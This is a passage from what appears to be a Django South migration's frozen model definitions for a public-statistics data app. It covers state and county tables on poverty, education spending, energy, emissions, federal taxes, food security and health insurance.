'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.childrenpovertystate': {
'Meta': {'object_name': 'ChildrenPovertyState'},
'children_poverty': ('django.db.models.fields.IntegerField', [], {}),
'children_poverty_moe': ('django.db.models.fields.IntegerField', [], {}),
'children_poverty_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'children_poverty_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'children_total': ('django.db.models.fields.IntegerField', [], {}),
'children_total_moe': ('django.db.models.fields.IntegerField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.childrenpovertystateraw': {
'Meta': {'object_name': 'ChildrenPovertyStateRaw'},
'children_poverty': ('django.db.models.fields.IntegerField', [], {}),
'children_poverty_moe': ('django.db.models.fields.IntegerField', [], {}),
'children_poverty_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'children_poverty_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'children_total': ('django.db.models.fields.IntegerField', [], {}),
'children_total_moe': ('django.db.models.fields.IntegerField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.county': {
'Meta': {'unique_together': "(('state', 'county_ansi'),)", 'object_name': 'County'},
'county_abbr': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'county_ansi': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'county_desc': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'county_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sort_order': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.diplomarecipienttotal': {
'Meta': {'object_name': 'DiplomaRecipientTotal'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.dropoutsrace': {
'Meta': {'object_name': 'DropoutsRace'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.drugfreeschoolspending': {
'Meta': {'object_name': 'DrugFreeSchoolSpending'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.educationalattainment': {
'Meta': {'object_name': 'EducationalAttainment'},
'category': ('django.db.models.fields.TextField', [], {'max_length': '64'}),
'gender': ('django.db.models.fields.TextField', [], {'max_length': '16'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.TextField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'value_type': ('django.db.models.fields.TextField', [], {'max_length': '16'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.electricemissionsstate': {
'Meta': {'unique_together': "(('year', 'state', 'producer_type', 'energy_source'),)", 'object_name': 'ElectricEmissionsState'},
'co2': ('django.db.models.fields.BigIntegerField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'energy_source': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nox': ('django.db.models.fields.BigIntegerField', [], {}),
'producer_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'so2': ('django.db.models.fields.BigIntegerField', [], {}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.electricemissionsstateraw': {
'Meta': {'object_name': 'ElectricEmissionsStateRaw'},
'co2': ('django.db.models.fields.BigIntegerField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'energy_source': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nox': ('django.db.models.fields.BigIntegerField', [], {}),
'producer_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'so2': ('django.db.models.fields.BigIntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.ellstudentsdistrict': {
'Meta': {'object_name': 'EllStudentsDistrict'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.employment': {
'Meta': {'object_name': 'Employment'},
'black_civilian_labor_force': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'black_unemployed': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'hispanic_civilian_labor_force': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'hispanic_unemployed': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'total_civilian_labor_force': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_civilian_labor_force': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'white_unemployed': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.energyconsumptionstate': {
'Meta': {'unique_together': "(('year', 'state', 'msn'),)", 'object_name': 'EnergyConsumptionState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msn': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.Msn']"}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.energyconsumptionstateraw': {
'Meta': {'object_name': 'EnergyConsumptionStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msn': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.energyproductionstate': {
'Meta': {'unique_together': "(('year', 'state', 'msn'),)", 'object_name': 'EnergyProductionState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msn': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.Msn']"}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.energyproductionstateraw': {
'Meta': {'object_name': 'EnergyProductionStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msn': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.enrolledstudentsdistrict': {
'Meta': {'object_name': 'EnrolledStudentsDistrict'},
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '9'})
},
'data.enrollmentrace': {
'Meta': {'object_name': 'EnrollmentRace'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.ethnicity': {
'Meta': {'object_name': 'Ethnicity'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'ethnicity_abbr': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '5'}),
'ethnicity_desc': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'ethnicity_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.expenditureperpupil': {
'Meta': {'object_name': 'ExpenditurePerPupil'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.familiespovertystate': {
'Meta': {'object_name': 'FamiliesPovertyState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'families_poverty_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'families_poverty_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'families_total': ('django.db.models.fields.IntegerField', [], {}),
'families_total_moe': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.familiespovertystateraw': {
'Meta': {'object_name': 'FamiliesPovertyStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'families_poverty_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'families_poverty_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'families_total': ('django.db.models.fields.IntegerField', [], {}),
'families_total_moe': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.fcnaspending': {
'Meta': {'object_name': 'FcnaSpending'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.federalimpactaid': {
'Meta': {'object_name': 'FederalImpactAid'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.federaltaxcollectionstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'FederalTaxCollectionState'},
'business_income': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'estate': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'estate_trust_income': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'excise': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'gift': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'individual_total': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'notwitheld_income_and_seca': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
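            # The 'notwitheld'/'witheld' spellings are kept as-is: they are
            # the frozen field names, so "correcting" them here would desync
            # this snapshot from the actual schema.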
'railroad_retirement': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'unemployment_insurance': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'witheld_income_and_fica': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.federaltaxcollectionstateraw': {
'Meta': {'object_name': 'FederalTaxCollectionStateRaw'},
'business_income_taxes': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'estate_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'estate_trust_income_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'excise_taxes': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'gift_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'income_employment_estate_trust_total': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'individual_notwitheld_seca': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'individual_witheld_fica': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'railroad_retirement': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'total_collections': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'unemployment_insurance': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.fipscountycongressdistrict': {
'Meta': {'object_name': 'FipsCountyCongressDistrict'},
'congress': ('django.db.models.fields.IntegerField', [], {}),
'county_code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'district_code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state_code': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'data.fipsstate': {
'Meta': {'object_name': 'FipsState'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'data.foodsecuritystate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'FoodSecurityState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'food_insecure': ('django.db.models.fields.IntegerField', [], {}),
'food_insecure_percent': ('django.db.models.fields.FloatField', [], {}),
'food_secure': ('django.db.models.fields.IntegerField', [], {}),
'food_secure_high': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'food_secure_high_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'food_secure_low': ('django.db.models.fields.IntegerField', [], {}),
'food_secure_low_percent': ('django.db.models.fields.FloatField', [], {}),
'food_secure_marginal': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'food_secure_marginal_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'food_secure_percent': ('django.db.models.fields.FloatField', [], {}),
'food_secure_very_low': ('django.db.models.fields.IntegerField', [], {}),
'food_secure_very_low_percent': ('django.db.models.fields.FloatField', [], {}),
'household_total': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'no_response': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.foodsecuritystateraw': {
'Meta': {'object_name': 'FoodSecurityStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'food_secure': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'food_secure_high': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'food_secure_low': ('django.db.models.fields.IntegerField', [], {}),
'food_secure_marginal': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'food_secure_very_low': ('django.db.models.fields.IntegerField', [], {}),
'household_total': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'no_response': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.freeluncheligible': {
'Meta': {'object_name': 'FreeLunchEligible'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.freereducedluncheligible': {
'Meta': {'object_name': 'FreeReducedLunchEligible'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.freereducedluncheligiblecounty': {
'Meta': {'object_name': 'FreeReducedLunchEligibleCounty'},
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'county_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.gender': {
'Meta': {'object_name': 'Gender'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'gender_abbr': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '1'}),
'gender_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.halfpints': {
'Meta': {'object_name': 'HalfPints'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.headstartenrollment': {
'Meta': {'object_name': 'HeadStartEnrollment'},
'enrollment': ('django.db.models.fields.IntegerField', [], {}),
'funding': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.healthinsurance': {
'Meta': {'object_name': 'HealthInsurance'},
'all_people': ('django.db.models.fields.IntegerField', [], {}),
'covered': ('django.db.models.fields.IntegerField', [], {}),
'covered_pct': ('django.db.models.fields.FloatField', [], {}),
'covered_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'covered_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'direct_purchase': ('django.db.models.fields.IntegerField', [], {}),
'direct_purchase_pct': ('django.db.models.fields.FloatField', [], {}),
'direct_purchase_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'direct_purchase_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'govt': ('django.db.models.fields.IntegerField', [], {}),
'govt_pct': ('django.db.models.fields.FloatField', [], {}),
'govt_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'govt_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'medicaid': ('django.db.models.fields.IntegerField', [], {}),
'medicaid_pct': ('django.db.models.fields.FloatField', [], {}),
'medicaid_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'medicaid_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'medicare': ('django.db.models.fields.IntegerField', [], {}),
'medicare_pct': ('django.db.models.fields.FloatField', [], {}),
'medicare_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'medicare_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'military': ('django.db.models.fields.IntegerField', [], {}),
'military_pct': ('django.db.models.fields.FloatField', [], {}),
'military_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'military_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'not_covered': ('django.db.models.fields.IntegerField', [], {}),
'not_covered_pct': ('django.db.models.fields.FloatField', [], {}),
'not_covered_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'not_covered_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private': ('django.db.models.fields.IntegerField', [], {}),
'private_employment': ('django.db.models.fields.IntegerField', [], {}),
'private_employment_pct': ('django.db.models.fields.FloatField', [], {}),
'private_employment_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private_employment_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private_pct': ('django.db.models.fields.FloatField', [], {}),
'private_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.healthinsurancestate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'HealthInsuranceState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pop': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_18_34_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_no_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_18_34_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_64': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_64_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_64_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_18_64_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_64_no_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_18_64_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_64_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_64_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_35_64_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_no_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_35_64_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_ins': ('django.db.models.fields.IntegerField', [], {}),
